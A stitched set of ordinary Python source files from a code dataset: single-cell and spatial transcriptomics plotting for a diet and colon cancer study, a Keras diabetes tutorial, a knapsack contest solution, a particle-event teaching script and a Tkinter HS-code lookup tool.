(df_hfd_vs_cd['log2FoldChange'] <= -lFCs_thr) & (df_hfd_vs_cd['padj'] <= sign_thr)\n set_hfd_vs_cd_mask_upreg= set(df_hfd_vs_cd[df_hfd_vs_cd_mask_upreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n set_hfd_vs_cd_mask_downreg= set(df_hfd_vs_cd[df_hfd_vs_cd_mask_downreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n\n df_lfd_vs_cd_mask_upreg = (df_lfd_vs_cd['log2FoldChange'] >= lFCs_thr) & (df_lfd_vs_cd['padj'] <= sign_thr)\n df_lfd_vs_cd_mask_downreg = (df_lfd_vs_cd['log2FoldChange'] <= -lFCs_thr) & (df_lfd_vs_cd['padj'] <=sign_thr)\n set_lfd_vs_cd_mask_upreg= set(df_lfd_vs_cd[df_lfd_vs_cd_mask_upreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n set_lfd_vs_cd_mask_downreg= set(df_lfd_vs_cd[df_lfd_vs_cd_mask_downreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n\n df_lfd_vs_hfd_mask_upreg = (df_lfd_vs_hfd['log2FoldChange'] >= lFCs_thr) & (df_lfd_vs_hfd['padj'] <= sign_thr)\n df_lfd_vs_hfd_mask_downreg = (df_lfd_vs_hfd['log2FoldChange'] <= -lFCs_thr) & (df_lfd_vs_hfd['padj'] <= sign_thr)\n set_lfd_vs_hfd_mask_upreg= set(df_lfd_vs_hfd[df_lfd_vs_hfd_mask_upreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n set_lfd_vs_hfd_mask_downreg= set(df_lfd_vs_hfd[df_lfd_vs_hfd_mask_downreg].sort_values('padj', ascending=True).iloc[:topn][\"Unnamed: 0\"])\n\n # venn3([set_hfd_vs_cd_mask_upreg.union(set_hfd_vs_cd_mask_downreg), set_lfd_vs_cd_mask_upreg.union(set_lfd_vs_cd_mask_downreg), set_lfd_vs_hfd_mask_upreg.union(set_lfd_vs_hfd_mask_downreg)], ('HFD vs. CD', 'LFD vs. CD', 'LFD vs. HFD'))\n venn3([set_hfd_vs_cd_mask_upreg, set_lfd_vs_cd_mask_upreg, set_lfd_vs_hfd_mask_upreg], ('HFD vs. CD', 'LFD vs. CD', 'LFD vs. HFD'))\n\n \n plt.show()\n venn3([set_hfd_vs_cd_mask_downreg, set_lfd_vs_cd_mask_downreg, set_lfd_vs_hfd_mask_downreg], ('HFD vs. CD', 'LFD vs. CD', 'LFD vs. 
HFD'))\n\n plt.show()\n\n# deg_venn_diagram()\n\ndef plot_custom_corr_heatmap():\n # colocalization analysis performed based on https://www.nature.com/articles/s41467-021-21892-z#Sec8\n sample_type = \"visium\"\n meta = utils.get_meta_data(sample_type)\n ref_ct= \"B cells-1\"\n cell_types = [\"IgA plasma cells-1\", \"Neutrophils\"]\n str_cell_types = \"_\".join(cell_types)\n lst_corr = []\n lst_cond = []\n dict_colocalization = dict()\n for ind, row in meta.iterrows():\n lst_cell_types = []\n sample_id = row[\"sample_id\"]\n condition = row[\"condition\"]\n df_abundance = pd.read_csv(f\"../data/out_data/cell2location_map/cell_type_abundances_{sample_id}_filtered_deconv_15_20.csv\", index_col=0)\n for ct in df_abundance.columns:\n ct = ct.split(\"_\")[-1]\n lst_cell_types.append(ct)\n df_abundance.columns = lst_cell_types\n \n corr = df_abundance.corr(method='pearson', min_periods=1)\n # print(corr)\n lst_cond.append(condition)\n lst_corr.append(list(corr[cell_types].loc[[ref_ct]].values[0]))\n\n pd_results = pd.DataFrame(lst_corr, columns=cell_types, index=lst_cond)\n print(pd_results)\n \n dict_cell_type =dict()\n\n for c_t in cell_types:\n dict_cell_type[c_t] = []\n\n\n for ind, row in pd_results.iterrows():\n diet = ind.split(\"-\")[0]\n \n for c_t in cell_types:\n \n if \"no-AOM-DSS\" in ind:\n dict_cell_type[c_t].append([\"no-AOM-DSS\", diet, row[c_t]])\n else:\n dict_cell_type[c_t].append([\"AOM-DSS\", diet, row[c_t]])\n\n print(dict_cell_type)\n\n for c_t in cell_types:\n print(c_t)\n df = pd.DataFrame(dict_cell_type[c_t], columns=['Group', \"Diet\", \"Score\"])\n print(df)\n # plot with seaborn barplot\n sns.barplot(data=df, x='Diet', y='Score', hue='Group').set(title=f'{ref_ct} vs. {c_t}')\n plt.tight_layout()\n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (240, 120)\n plt.savefig(f\"../plots/vis_deconvolution/barplot_{ref_ct}_vs_{c_t}.pdf\")\n plt.clf()\n \n pd_results = pd_results.transpose()\n # print(pd_results)\n # cmap = sns.diverging_palette(230, 20, as_cmap=True)\n sns.heatmap(pd_results, annot=False, xticklabels=True, yticklabels=True)\n plt.tight_layout()\n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (240, 120)\n plt.savefig(f\"../plots/vis_deconvolution/heatmap_{ref_ct}_vs_{str_cell_types}.pdf\")\n plt.close()\n\n\n\n\n# plot_custom_corr_heatmap()\n\ndef plot_dotplot_tumor_markers_vs_conditions():\n adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_integrated_clustered.h5ad\")\n df_over_threshold = pd.read_csv(f\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_tumor_markers_combined_thr_5.csv\")\n \n adata = utils.get_filtered_concat_data(\"sc_epicells\")\n adata = adata[adata_integ_clust.obs_names,:]\n adata.obs[\"leiden_0.20\"] = adata_integ_clust.obs[\"leiden_0.20\"]\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n print(df_over_threshold[\"Over threshold\"].values)\n adata.obs[\"tumor_markers\"] = df_over_threshold[\"Over threshold\"].values\n # adata = adata[adata.obs[\"tumor_markers\"]==1,:]\n # filter out the cells missing in adata_integ_clust\n # \n # print(adata[adata.obs[\"tumor_markers\"].isin([1]),:])\n \n print(adata)\n adata.var.index = pd.Index(gen.upper() for gen in adata.var.index.values)\n # markers = [\"WIF1\", \"AXIN2\", \"NKD1\", \"NOTUM\", \"MMP7\", \"PROX1\", \"SOX4\"]\n markers = [\"WIF1\", \"NKD1\", \"NOTUM\", \"MMP7\", \"PROX1\"]\n # sc.pl.dotplot(adata, markers, groupby='condition', 
standard_scale='group', dendrogram=False, show=False)\n # sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='var', dendrogram=False, show=False)\n sc.pl.dotplot(adata, markers, groupby='condition', dendrogram=True, show=False, save=\"epicells_tumor_markers_no-AXIN1-no-SOX4.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='var', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_var-no-AXIN1-no-SOX4.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='group', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_group-no-AXIN1-no-SOX4.pdf\")\n \"\"\"sc.pl.dotplot(adata, markers, groupby='condition', dendrogram=True, show=False, save=\"epicells_tumor_markers.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='var', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_var.pdf\")\n sc.pl.dotplot(adata, markers, groupby='condition', standard_scale='group', dendrogram=True, show=False, save=\"epicells_tumor_markers_ss_group.pdf\")\"\"\"\n # plt.tight_layout()\n # plt.savefig(\"../plots/sc_epi_cells_aom_noaom_visualize_markers/dot_plot.pdf\")\n \n# plot_dotplot_tumor_markers_vs_conditions()\n\n\ndef plot_dotplot_tumor_markers_vs_individual_condition(condition, group_by):\n # adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_integrated_clustered.h5ad\")\n adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_concatenated_celltype_annot.h5ad\")\n adata = utils.get_filtered_concat_data(\"sc_epicells_aom_noaom\")\n adata_integ_clust = adata_integ_clust[adata_integ_clust.obs[\"condition\"]==condition,:]\n adata = adata[adata_integ_clust.obs_names,:]\n adata.obs[group_by] = adata_integ_clust.obs[group_by]\n adata_integ_clust.obs[\"condition\"][condition] = condition.split(\"_\")[0]\n condition = condition.split(\"_\")[0]\n\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n adata_integ_clust.var.index = pd.Index(gen.upper() for gen in adata_integ_clust.var.index.values)\n adata.var.index = pd.Index(gen.upper() for gen in adata.var.index.values)\n # markers = [\"EPCAM\", \"CDH1\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"AXIN2\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n markers = [ \"EPCAM\", \"CDH1\", \"CDHR5\", \"MUC3\", \"MUC2\", \"REG4\", \"AXIN2\", \"SOX4\", \"IFITM3\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"]\n # markers = [\"EPCAM\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n\n sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, vmax=10, show=False, save=f\"epicells_{condition}.pdf\")\n # sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, standard_scale='var', show=False, save=f\"epicells_{condition}.pdf\")\n \n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='var', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_var.pdf\")\n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='group', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_group.pdf\")\n\n\n\"\"\"plot_dotplot_tumor_markers_vs_individual_condition(\"CD-AOM-DSS-Epi_plus_DN\", 
\"cluster\")\nplot_dotplot_tumor_markers_vs_individual_condition(\"Control-no-AOM-DSS-Immune\", \"cluster\")\nplot_dotplot_tumor_markers_vs_individual_condition(\"HFD-AOM-DSS-Epi_plus_DN\", \"cluster\")\nplot_dotplot_tumor_markers_vs_individual_condition(\"LFD-AOM-DSS-Epi_plus_DN\", \"cluster\")\"\"\"\n\n\ndef plot_dotplot_cancer_vs_control(group_by):\n adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_integrated_clustered.h5ad\")\n adata = utils.get_filtered_concat_data(\"sc_epicells_aom_noaom\")\n adata = adata[adata_integ_clust.obs_names,:]\n adata.obs[\"leiden_0.20\"] = adata_integ_clust.obs[\"leiden_0.20\"]\n adata.obs[\"crc\"] = \"no-AOM-DSS\"\n adata.obs.loc[adata[adata.obs[\"condition\"].isin([\"CD-AOM-DSS-Epi_plus_DN\", \"HFD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\"]),:].obs_names, 'crc'] = \"AOM-DSS\"\n \n \"\"\"for cond in [\"CD-AOM-DSS-Epi_plus_DN\", \"Control-no-AOM-DSS-Immune\", \"HFD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\"]:\n \n if \"Immune\" in cond:\n adata[adata.obs[\"condition\"]==cond,: ].obs[\"crc\"] = \"no-AOM-DSS\"\n else:\n adata[adata.obs[\"condition\"]==cond,: ].obs[\"crc\"] = \"AOM-DSS\"\n # adata.obs[\"condition\"][\"Control-no-AOM-DSS-Immune\"] = \"No-AOM-DSS\"\n # adata.obs[\"condition\"][\"HFD-AOM-DSS-Epi_plus_DN\"] = \"AOM-DSS\"\n # adata.obs[\"condition\"][\"LFD-AOM-DSS-Epi_plus_DN\"] = \"AOM-DSS\"\n \"\"\"\n\n print(adata.obs[\"crc\"])\n print(adata)\n\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n adata_integ_clust.var.index = pd.Index(gen.upper() for gen in adata_integ_clust.var.index.values)\n adata.var.index = pd.Index(gen.upper() for gen in adata.var.index.values)\n # markers = [\"EPCAM\", \"CDH1\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"AXIN2\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n # markers = [\"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"] \n markers = [ \"EPCAM\", \"CDH1\", \"CDHR5\", \"MUC3\", \"MUC2\", \"REG4\", \"AXIN2\", \"SOX4\", \"IFITM3\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"]\n # markers = [\"EPCAM\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n\n sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, show=False, save=f\"epicells_aom-dss_no-aom-dss.pdf\")\n\n markers = [\"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"] \n sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, show=False, save=f\"epicells_aom-dss_no-aom-dss_excluding_HEGs.pdf\") \n \n top10_16_clust = [\"NKD1\", \"ASPSCR1\", \"IFITM3\", \"NOTUM\", \"PROX1\", \"CYBA\", \"WIF1\", \"FAM89A\", \"MT3\", \"IFITM1\"]\n sc.pl.dotplot(adata, top10_16_clust, groupby=group_by, dendrogram=False, show=False, save=f\"epicells_aom-dss_no-aom-dss_clust_16_top10_DEGs.pdf\") \n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='var', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_var.pdf\")\n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='group', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_group.pdf\")\n\n# plot_dotplot_cancer_vs_control(\"crc\")\n\n\ndef plot_barplot_cell_proportion_in_cluster(adata_path, sample_type, obs_cluster):\n # 
colocalization analysis performed based on https://www.nature.com/articles/s41467-021-21892-z#Sec8\n    adata = sc.read_h5ad(adata_path)\n\n    meta = utils.get_meta_data(sample_type)\n    condition = list(np.unique(meta['condition']))\n    condition = [\"Control-no-AOM-DSS-Immune\", \"CD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\", \"HFD-AOM-DSS-Epi_plus_DN\"]\n    prop_lst = []\n\n\n    for clust in adata.obs[obs_cluster].cat.categories:\n        adata_tmp = adata[adata.obs[obs_cluster]==clust,:]\n        n_of_cells = adata_tmp.shape[0]\n        # prop_dict[clust] = []\n        \n        for cond in condition:\n            adata_tmp2 = adata_tmp[adata_tmp.obs[\"condition\"]==cond,:]\n            proportion = adata_tmp2.shape[0]/n_of_cells\n\n            print(clust, cond, n_of_cells, adata_tmp2.shape)    \n            cond_lbl = cond.split(\"_\")[0]\n            if \"Control\" in cond:\n                cond_lbl = \"no-AOM-DSS\"\n            \n            prop_lst.append([cond_lbl, clust, proportion])\n        \n\n\n\n\n    df = pd.DataFrame(prop_lst, columns=['Group', \"Cluster\", \"Proportion\"])\n    sns.set(font_scale = 0.5)\n    sns.barplot(data=df, x='Cluster', y='Proportion', hue='Group').set(title='Proportions of Cells in Clusters')\n    \n    plt.rcParams['figure.dpi']= 300\n    plt.rcParams['figure.figsize']= (240, 120)\n    # plt.xticks(rotation=45)\n    # fig.tick_params(labelsize=5)\n    plt.tight_layout()\n    plt.savefig(f\"../plots/sc_epicells_aom_noaom_cluster/barplot_proportion_cluster.pdf\")  \n    plt.clf()\n\n# plot_barplot_cell_proportion_in_cluster(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_integrated_clustered.h5ad\", \"sc_epicells_aom_noaom\", \"leiden_0.20\")\n# plot_barplot_cell_proportion_in_cluster(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_integrated_clustered.h5ad\", \"sc_epicells_aom_noaom\", \"leiden_0.20\")\nplot_barplot_cell_proportion_in_cluster(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_concatenated_celltype_annot.h5ad\", \"sc_epicells_aom_noaom\", \"cluster\")\n\ndef plot_barplot_markers_vs_groups(adata, markers, group_by):\n\n    expression_cutoff = 0.0\n    markers = ['CD3D', 'CD79A','CST3']\n    dp = sc.pl.DotPlot(adata, markers, groupby=group_by)\n    obs_bool = dp.obs_tidy > expression_cutoff\n    dot_color_df = (dp.obs_tidy.mask(~obs_bool).groupby(level=0).mean().fillna(0))","repo_name":"saezlab/CRCDiet","sub_path":"bin/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":32887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34042064262","text":"# TensorFlow and tf.keras\n# imports everything needed\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport numpy\n# sets random seed to 7 for reproducing the same results every time\nnumpy.random.seed(7)\n\n# loads the dataset for the pima indians, found in ./data\ndataset = numpy.loadtxt(\"./data/pima-indians-diabetes.csv\", delimiter=\",\")\n\n# slices data:\n# the first : means all rows, the 0:8 means columns 0 through 7, so column 8 (the label) is excluded\nX = dataset[:,0:8]\n# the first : means all rows, the 8 means ONLY the 8th column, in other words, the output. 
\nY = dataset[:,8]\n\n# creates model layer by layer\n# model type, Sequential\nmodel = Sequential()\n# adds the first layer (Dense means that the layers are fully connected, every node connects to every node)\n# The 12 means 12 neurons, input dim means 8 inputs (one for each part of the data) and activation is the rectifier (ReLU), meaning \n# that negative inputs are clipped to zero and positive inputs pass through linearly \nmodel.add(Dense(12, input_dim=8, activation='relu'))\n# this adds a second Dense layer, with 8 neurons, and the same rectifier (ReLU) activation\nmodel.add(Dense(8, activation='relu'))\n# this is the final layer, so only 1 neuron, because there is a binary answer if someone has diabetes\n# the activation for this layer is sigmoid, this is a function that only outputs an answer between 0 and 1, making it a good \n# activation function for specifically predictions, considering something can't have a 110% chance of happening. \nmodel.add(Dense(1, activation='sigmoid'))\n\n# This sets up the model to be run efficiently on a computer depending on hardware, so this is the part that optimizes \n# using Tensorflow. \n# It's important to define the kind of loss used for optimal predictions, in this case,\n# the loss in this model is logarithmic, defined as binary cross-entropy\n# Adam will be used as the gradient descent algorithm primarily because it's efficient \n# Finally, because this problem is classification, accuracy is the best metric to measure. \nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# This fits the data to the model in order for the model to be trained, \n# epochs is the number of full passes through the dataset while \n# batch size is the number of datapoints looked at before the weights are changed\n# finally, verbose is just the progress bar. 
\nmodel.fit(X,Y, epochs=15, batch_size=10, verbose=2)\n\n\n# scores holds the model's loss and accuracy, evaluated on the inputs (X) against the labels (Y)\nscores = model.evaluate(X,Y)\n# this prints what's shown in the console, in other words, the accuracy\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n\n\n# # predictions is the model's predictions\n# predictions = model.predict(X)\n\n# # rounded is equal to the rounded version of predictions since it used the sigmoid function, \n# # rounded is always either 0 or 1\n# rounded = [round(x[0]) for x in predictions]\n# # this prints the predictions\n# print(rounded)","repo_name":"alejandro123210/Deep-learning-Projects","sub_path":"diabetesPrediction/diabetesPrediction.py","file_name":"diabetesPrediction.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8797148669","text":"N,W =map(int,input().split())\ninf = 10**10\ndp = [[inf]*(100001) for _ in range(N+1)]\nfor i in range(N+1):\n    dp[i][0] = 0\nfor i in range(N):\n    w,v = map(int,input().split())\n    for j in range(100001):\n        if j - v >= 0:\n            if w + dp[i][j-v] <= W:\n                dp[i+1][j] = min(dp[i][j],w + dp[i][j-v])\n            else:\n                dp[i+1][j] = dp[i][j]\n        else:\n            dp[i+1][j] = dp[i][j]\n# print(dp[-2][:18])\nfor j in range(len(dp[-1])-1,-1,-1):\n    if dp[-1][j] < inf:\n        print(j)\n        exit()\n","repo_name":"shimamura10/Atcoder","sub_path":"edpc/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35223786743","text":"import numpy 
\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib import pyplot \n\n# ========================== Loop Review =============================\n\n# great for when you need to do one thing a lot of times \n\n# ====== While Loop \n# while <condition>:\n    # do this\n\nx = 0\nwhile x < 10:\n    print(x)  \n    x = x + 1\n\n# ====== For loop\n\n# for each_entry in list_like:\n    # do stuff. \n\nproton = ['up', 'up', 'down', 'gluon']\nfor item in proton:\n    print(item)\n\n# how many vowels are in the proton?\nvowels = ['a', 'e', 'i', 'o', 'u']\nvowels_counted = 0\nfor item in proton:\n    for letter in item:\n        if letter in vowels:\n            vowels_counted += 1\n\n# loop over list incl [0,1,...,9]. Print square of entry\nfor item in range(10):\n    print(item**2)\n\n# ========================== SOLUTIONS ================================\n\nEvents = numpy.loadtxt(\"Events.dat\")\n\n# Ex 1 - 2 minutes \n\ntemp = Events[9][5]\nprint(temp)\n\n\n# Ex 2 - 2 minutes \ntemp = Events[1000][12]\nprint(temp)\n\n# Ex 3 - 15 minutes \n# hist energy of highest pt Lep\n\n# get list of energies\n# so first we make two numpy arrays which we'll use to store the energies \nnumber = len(Events)\nenergies_first = numpy.zeros(number)\nenergies_second = numpy.zeros(number)\n\niterate = 0\nwhile iterate < number:\n    # then we loop over all the events and assign energies to our new arrays\n    energies_first[iterate] = Events[iterate][5]\n    energies_second[iterate] = Events[iterate][11]\n\n    iterate += 1\n\n# make histograms \nbins = numpy.linspace(0,1000,101) #note! We use 101, since this is the number of edges and not bins! \n\npyplot.hist(energies_first, bins)\npyplot.hist(energies_second, bins)\npyplot.xlabel(\"Energy [GeV]\")\npyplot.ylabel(\"Count\")\npyplot.show()\n\n# Ex 4 - 15 minutes \n\n# Some counters we can use. Basically just integers. 
\nplus_plus = 0\nminus_minus = 0\nplus_minus = 0\nminus_plus = 0\n\nsame_sign = []\nopp_sign = []\n\niterate = 0\n# we loop over all the events, and count them up! \nwhile iterate < number:\n    event = Events[iterate]\n    \n    if event[6]>0:\n        if event[12]>0:\n            plus_plus += 1\n            same_sign.append(event)\n        else:\n            plus_minus += 1  \n            opp_sign.append(event)\n    else:\n        if event[12]>0:\n            minus_plus += 1\n            opp_sign.append(event)\n        else:\n            minus_minus += 1\n            same_sign.append(event)\n\n    iterate += 1\n\nnumpy.savetxt(\"same_sign.txt\", same_sign)\nnumpy.savetxt(\"opp_sign.txt\",opp_sign)\nprint(\"Both plus: {}\".format(plus_plus))\nprint(\"Minus Plus: {}\".format(minus_plus))\nprint(\"Plus Minus: {}\".format(plus_minus))\nprint(\"Minus Minus: {}\".format(minus_minus))\n\n# Ex 5 - 15 minutes\n# this one's a lot trickier! \n# we prepare some empty lists \ntwo_mu = []\ntwo_el = []\nmu_el = []\n\niterate = 0\nwhile iterate < number:\n    # loop over the events\n    # check what kind of event it is, then append the whole event to the relevant list \n    event = Events[iterate]\n    if abs(event[7])==11 and abs(event[13])==11: # two electrons\n        two_el.append(event)\n    \n    if abs(event[7])==13 and abs(event[13])==13: # two muons \n        two_mu.append(event)\n    \n    if (abs(event[7])==11 and abs(event[13])==13) or (abs(event[7])==13 and abs(event[13])==11):\n        # electron and muon OR muon and electron\n        mu_el.append(event)\n\n    iterate += 1\n\nprint(\"Two Mu: {}\".format(len(two_mu)))\nprint(\"Two El: {}\".format(len(two_el)))\nprint(\"Combo: {}\".format(len(mu_el)))\n\n# Ex 6 - 3 minutes\n# save the files\nnumpy.savetxt(\"two_mu.txt\",two_mu)\nnumpy.savetxt(\"two_el.txt\",two_el)\nnumpy.savetxt(\"mu_el.txt\",mu_el)\n\n### =========================== Alternate Solutions =====================================\nprint(\"Starting Alternates!\")\n\n# these are some other, weirder ways we can solve the exercises\n\n# Ex 3\n\n# look up python list comprehension! It's fun \nenergies = numpy.transpose([[evt[5], evt[11]] for evt in Events])\n\npyplot.hist(energies[0], numpy.linspace(0,1000,100))\npyplot.hist(energies[1], numpy.linspace(0,1000,100))\npyplot.xlabel(\"Energy [GeV]\")\npyplot.ylabel(\"Count\")\npyplot.show()\n\n# Ex 4\n\n# Ex 5\ntwo_mu = [event for event in Events if (abs(event[7])==13 and abs(event[13])==13) ]\ntwo_el = [event for event in Events if (abs(event[7])==11 and abs(event[13])==11) ]\nmu_el = [event for event in Events if ((abs(event[7])==11 and abs(event[13])==13) or (abs(event[7])==13 and abs(event[13])==11))]\n\nprint(\"Two Mu: {}\".format(len(two_mu)))\nprint(\"Two El: {}\".format(len(two_el)))\nprint(\"Combo: {}\".format(len(mu_el)))\n","repo_name":"BenSmithers/Analysis","sub_path":"summer_camp/lesson4.py","file_name":"lesson4.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"44586049184","text":"import re\nimport pandas as pd\nimport sqlite3\nfrom tkinter import *\nfrom tkinter import messagebox\nimport os, sys\n\n#should get the values in the list already created and print them before the results \n#is having more values good? 
because I cannot get them by index in a list??\n\n#creating the interface\nroot=Tk()\ninput_box=Text(padx=15)\noutput_box=Text(padx=15)\n\n\nroot.geometry(\"400x400\")\n#initialize the list here\n\n#choosing the right db\n#we can use a list of lists to process this and create lists dynamically \n\ndef creating_all_the_dbs_lists():\n    global zip_dict\n    global dbs\n    choice = [ \"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\", \"nine\"]\n    dbs = [[] for i in range(10)]\n    count = -1\n    for i in choice:\n        # we index the values in the lists of lists to get what we need\n        with sqlite3.connect(\"C:\\\\Users\\\\cavazzinil\\\\OneDrive - YOOX NET-A-PORTER GROUP\\\\Desktop\\\\ff\\\\hs_codes\\\\hs_codes.db\") as conn:\n            command = (\"SELECT codes, description  FROM \" + i ) #LIKE 'i%'\n            result = conn.execute(command)\n            list_of_results = result.fetchall()\n            zip_dict = (dict(list_of_results))\n            count = count + 1\n            dbs[count].append(zip_dict)\n    \n\ncreating_all_the_dbs_lists()\n\n\ndef checking_for_input():\n    global results\n    global codes  \n    codes = []\n    results = []\n    #getting the inputs \n    #output_box.delete(0, END)\n    print(\"entering the function\")\n    h=input_box.get(\"1.0\", \"end\").strip().split()\n    no_dupl = list(dict.fromkeys(h))\n    for i in no_dupl:\n        checking_list_inputs(i)\n    for i in range(len(results)):\n        output_box.insert(\"end\", codes[i] + \"  \" + results[i] + '\\n')\n\n\n\ndef clean_the_input(input_word):\n    separators = [\"-\",\",\", \"/\", \".\", \"*\", \" \", \"  \", \" m\", \"m\" ,\"a\", \"t\", \"c\", \"h\", \"'\", \"]\", \">\", \"=\", \")\"]\n    #turning it to string\n    new_word = \"\".join([i for i in input_word if i not in separators])\n    return new_word\n\ndef calculating_x(base, n):\n    global x\n    #need to work on the algorithm here to reload once it has been checked \n    x = re.search(fr\"{base}\", n)\n    if x!=None:\n        return base, n\n\n\ndef checking_list_inputs(word):\n    global chosen_list_in_dict\n    try:\n        cleaned_word = clean_the_input(word)\n        if str.isdigit(cleaned_word[:1]):\n            start_inp = int(cleaned_word[:1])\n            chosen_list = dbs[start_inp]\n            chosen_list_in_dict = {}\n            #could have here a mechanism that checks if the word contains only numbers\n            #if not i put it into the output window\n            for i in chosen_list:\n                chosen_list_in_dict.update(i)\n            #needs to be a while loop that strips the values as we go until something is found\n            first_iteration = [calculating_x(cleaned_word, i) for i in chosen_list_in_dict]\n            result_first_iteration = [i for i in first_iteration if i!=None]\n            if len(result_first_iteration)==0:\n                second_iteration = [calculating_x(cleaned_word[:-2], i) for i in chosen_list_in_dict]\n                result_first_iteration = [i for i in second_iteration if i!=None]\n            #(str(result_second_iteration).split(\",\"))[2]\n            #need to index here !!!!! 
in case it is not found at the first iteration \n            tupling = tuple(str(result_first_iteration).split(\",\"))\n            output_of_cleaning_tuple = (clean_the_input(tupling[1]))\n            \n            \n            results.append(chosen_list_in_dict[output_of_cleaning_tuple])\n            codes.append(output_of_cleaning_tuple)\n\n\n\n            \n            #results.append(\" WARNING, NOT FOUND AS A VALID HS CODE\")\n            #codes.append(cleaned_word)\n            #print here as both loops have been checked, need to change n here\n            #\n            \n        else:\n            results.append(\" WARNING, NOT A VALID NUMERIC HS CODE\")\n            codes.append(cleaned_word)\n\n    except Exception as e :\n        messagebox.showinfo(message='An error has occurred ')\n        print(e)\n        exc_type, exc_obj, exc_tb = sys.exc_info()\n        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n        print(exc_type, fname, exc_tb.tb_lineno)\n\n#trying to call the function here to see if it 